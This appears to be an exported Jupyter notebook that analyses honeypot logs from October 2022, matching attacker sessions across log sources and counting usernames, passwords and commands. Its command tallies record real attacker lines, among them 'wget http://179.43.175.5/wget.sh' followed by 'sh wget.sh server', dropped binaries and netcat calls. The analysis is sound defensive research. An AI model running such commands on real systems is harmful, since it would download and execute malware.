,containerType,IP,Time,attackerPwd,numCMDS,noninteractive,apacheType,userAgent,apacheTime,apacheIP,apacheContainer
attackerUser,,,,,,,,,,,
git,17,17,17,17,17,17,17,17,17,17,17
root,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189,6189


In [39]:
usable2.groupby(by='attackerPwd').count()

,containerType,IP,Time,attackerUser,numCMDS,noninteractive,apacheType,userAgent,apacheTime,apacheIP,apacheContainer
attackerPwd,,,,,,,,,,,
!QAZ@WSX,29,29,29,29,29,29,29,29,29,29,29
1,6158,6158,6158,6158,6158,6158,6158,6158,6158,6158,6158
111,1,1,1,1,1,1,1,1,1,1,1
12345qwert,17,17,17,17,17,17,17,17,17,17,17
toor,1,1,1,1,1,1,1,1,1,1,1


# TCP second check (same container types for 1/2)

In [40]:
tcpMatch2 = mitm.loc[(mitm['IP'].isin(tcp['IP'])) & (mitm['containerType'].isin(tcp['containerType']))]
tcpMatch2 = tcpMatch2.reset_index()
tcpMatch2 = tcpMatch2.drop(columns='index')
tcpMatch2

,containerType,IP,Time,attackerUser,attackerPwd,numCMDS,noninteractive
0,pwd,173.18.35.41,2022-10-24 06:29:53.320,git,12345qwert,1,y
1,pwd,191.242.188.103,2022-10-23 17:47:57.987,git,12345qwert,1,y
2,pwd,209.216.177.158,2022-10-24 04:23:02.961,git,12345qwert,1,y
3,pwd,31.165.5.151,2022-10-23 11:36:31.614,git,12345qwert,1,y
4,pwd,91.125.119.231,2022-10-23 21:35:27.480,git,12345qwert,1,y
...,...,...,...,...,...,...,...
37274,pwd,84.6.79.211,2022-10-30 23:14:07.893,root,1,1,y
37275,pwd,73.42.244.8,2022-10-31 01:25:47.965,root,1,1,y
37276,pwd,145.40.73.79,2022-10-30 12:49:09.289,root,1,1,y
37277,pwd,124.221.181.83,2022-10-30 12:53:25.129,root,1,1,y


In [41]:
tcpShorter2 = tcp.loc[(tcp['IP'].isin(mitm['IP'])) & (tcp['containerType'].isin(mitm['containerType']))]
tcpShorter2

,IP,Time,containerType
692,180.93.32.58,2022-10-26 19:00:19.082565,pwd
693,180.93.32.58,2022-10-26 19:00:19.334816,pwd
694,180.93.32.58,2022-10-26 19:00:19.337175,pwd
695,180.93.32.58,2022-10-26 19:00:19.337175,pwd
699,180.93.32.58,2022-10-26 19:04:08.251953,pwd
...,...,...,...
273212,27.1.44.56,2022-10-23 09:13:39.224025,pwd
273213,27.1.44.56,2022-10-23 09:13:39.224025,pwd
273214,27.1.44.56,2022-10-23 09:13:44.260613,pwd
273215,27.1.44.56,2022-10-23 09:13:59.241195,pwd


In [42]:
matchTCP(tcpMatch2, tcpShorter2)

In [43]:
usableTCP2 = tcpMatch2.dropna()
usableTCP2

,containerType,IP,Time,attackerUser,attackerPwd,numCMDS,noninteractive,tcpContainer,tcpTime,tcpIP
0,pwd,173.18.35.41,2022-10-24 06:29:53.320,git,12345qwert,1,y,pwd,2022-10-24 04:45:04.575609,173.18.35.41
1,pwd,191.242.188.103,2022-10-23 17:47:57.987,git,12345qwert,1,y,pwd,2022-10-23 06:38:39.006539,191.242.188.103
2,pwd,209.216.177.158,2022-10-24 04:23:02.961,git,12345qwert,1,y,pwd,2022-10-24 01:43:48.569657,209.216.177.158
5,pwd,84.16.224.173,2022-10-23 21:09:01.608,root,1,1,y,pwd,2022-10-23 21:06:56.779690,84.16.224.173
9,pwd,20.127.87.36,2022-10-24 11:58:17.165,git,12345qwert,1,y,pwd,2022-10-24 02:03:45.510898,20.127.87.36
...,...,...,...,...,...,...,...,...,...,...
37273,pwd,58.216.8.121,2022-10-30 16:44:43.865,root,1,1,y,pwd,2022-10-29 03:47:21.264483,58.216.8.121
37274,pwd,84.6.79.211,2022-10-30 23:14:07.893,root,1,1,y,pwd,2022-10-30 20:16:18.243414,84.6.79.211
37276,pwd,145.40.73.79,2022-10-30 12:49:09.289,root,1,1,y,pwd,2022-10-30 11:28:35.015794,145.40.73.79
37277,pwd,124.221.181.83,2022-10-30 12:53:25.129,root,1,1,y,pwd,2022-10-28 18:43:38.098723,124.221.181.83


## Output

In [44]:
exportCSV(usableTCP2, 'outTCP2')

In [45]:
filteredTCPCMDS2 = cmds[(cmds['IP'].isin(usableTCP2['IP'])) & (cmds['containerType'].isin(usableTCP2['containerType'])) & (cmds['Time'].isin(usableTCP2['Time']))]
filteredTCPCMDS2

,containerType,IP,Time,attackerUser,attackerPwd,noninteractive,command
0,pwd,173.18.35.41,2022-10-24 06:29:53.320,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
1,pwd,191.242.188.103,2022-10-23 17:47:57.987,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
2,pwd,209.216.177.158,2022-10-24 04:23:02.961,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
5,pwd,84.16.224.173,2022-10-23 21:09:01.608,root,1,y,uname -a
10,pwd,20.127.87.36,2022-10-24 11:58:17.165,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
...,...,...,...,...,...,...,...
45686,pwd,58.216.8.121,2022-10-30 16:44:43.865,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45687,pwd,84.6.79.211,2022-10-30 23:14:07.893,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45689,pwd,145.40.73.79,2022-10-30 12:49:09.289,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45690,pwd,124.221.181.83,2022-10-30 12:53:25.129,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...


In [46]:
exportCSV(filteredTCPCMDS2, 'outTCPCMDS2')

In [47]:
filteredTCPCMDS2.groupby(by='command').count()

,containerType,IP,Time,attackerUser,attackerPwd,noninteractive
command,,,,,,
./666bins x86,1,1,1,1,1,1
./wget.sh server,2,2,2,2,2,2
./x0x524c1e4,1,1,1,1,1,1
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234,10074,10074,10074,10074,10074,10074
cat /etc/issue,1,1,1,1,1,1
cat 666.x86 >666bins,1,1,1,1,1,1
cat > ./ifconfig,9,9,9,9,9,9
cat > /dev/shm/ifconfig,86,86,86,86,86,86
cat > /etc/ifconfig,12,12,12,12,12,12


In [48]:
usableTCP2.groupby(by='IP').count()

,containerType,Time,attackerUser,attackerPwd,numCMDS,noninteractive,tcpContainer,tcpTime,tcpIP
IP,,,,,,,,,
1.220.98.197,146,146,146,146,146,146,146,146,146
101.35.198.225,52,52,52,52,52,52,52,52,52
101.35.232.15,32,32,32,32,32,32,32,32,32
101.43.128.242,3,3,3,3,3,3,3,3,3
102.141.225.238,103,103,103,103,103,103,103,103,103
...,...,...,...,...,...,...,...,...,...
91.125.119.231,70,70,70,70,70,70,70,70,70
93.103.126.32,178,178,178,178,178,178,178,178,178
93.176.229.145,121,121,121,121,121,121,121,121,121


In [49]:
usableTCP2.groupby(by='attackerUser').count()

,containerType,IP,Time,attackerPwd,numCMDS,noninteractive,tcpContainer,tcpTime,tcpIP
attackerUser,,,,,,,,,
a,114,114,114,114,114,114,114,114,114
admin,228,228,228,228,228,228,228,228,228
git,531,531,531,531,531,531,531,531,531
jeff,2,2,2,2,2,2,2,2,2
root,14331,14331,14331,14331,14331,14331,14331,14331,14331


In [50]:
usableTCP2.groupby(by='attackerPwd').count()

,containerType,IP,Time,attackerUser,numCMDS,noninteractive,tcpContainer,tcpTime,tcpIP
attackerPwd,,,,,,,,,
!QAZ@WSX,34,34,34,34,34,34,34,34,34
!qAz@wSx,1,1,1,1,1,1,1,1,1
1,14281,14281,14281,14281,14281,14281,14281,14281,14281
111,6,6,6,6,6,6,6,6,6
111111,1,1,1,1,1,1,1,1,1
123454321,1,1,1,1,1,1,1,1,1
1234567,3,3,3,3,3,3,3,3,3
12345qwert,531,531,531,531,531,531,531,531,531
1234qazwsx,1,1,1,1,1,1,1,1,1


In [51]:
cmdsByContainerTCP2 = filteredTCPCMDS2.groupby(by=['containerType', 'command']).count()
cmdsByContainerTCP2

IP  Time  \
containerType command                                                          
blank          ./x0x524c1e4                                          1     1   
               PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/...  2597  2597   
               cat /etc/issue                                        1     1   
               cat > ./ifconfig                                      1     1   
               cat > /dev/shm/ifconfig                              22    22   
...                                                                ...   ...   
swipe          echo > /var/tmp/ifconfig                              6     6   
               rm -rf wget*                                          1     1   
               sh wget.sh server                                     1     1   
               uname -a                                            743   743   
               wget http://179.43.175.5/wget.sh                      1     1   

                                                                  attackerUser  \
containerType command                                                            
blank          ./x0x524c1e4                                                  1   
               PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/...          2597   
               cat /etc/issue                                                1   
               cat > ./ifconfig                                              1   
               cat > /dev/shm/ifconfig                                      22   
...                                                                        ...   
swipe          echo > /var/tmp/ifconfig                                      6   
               rm -rf wget*                                                  1   
               sh wget.sh server                                             1   
               uname -a                                                    743   
               wget http://179.43.175.5/wget.sh                              1   

                                                                  attackerPwd  \
containerType command                                                           
blank          ./x0x524c1e4                                                 1   
               PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/...         2597   
               cat /etc/issue                                               1   
               cat > ./ifconfig                                             1   
               cat > /dev/shm/ifconfig                                     22   
...                                                                       ...   
swipe          echo > /var/tmp/ifconfig                                     6   
               rm -rf wget*                                                 1   
               sh wget.sh server                                            1   
               uname -a                                                   743   
               wget http://179.43.175.5/wget.sh                             1   

                                                                  noninteractive  
containerType command                                                             
blank          ./x0x524c1e4                                                    1  
               PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/...            2597  
               cat /etc/issue                                                  1  
               cat > ./ifconfig                                                1  
               cat > /dev/shm/ifconfig                                        22  
...                                                                          ...  
swipe          echo > /var/tmp/ifconfig                                        6  
               rm -rf wget*                                                    1  
               sh wget.sh server                                            

In [52]:
exportCSV(cmdsByContainerTCP2, 'cmdsbyContainerTCP2')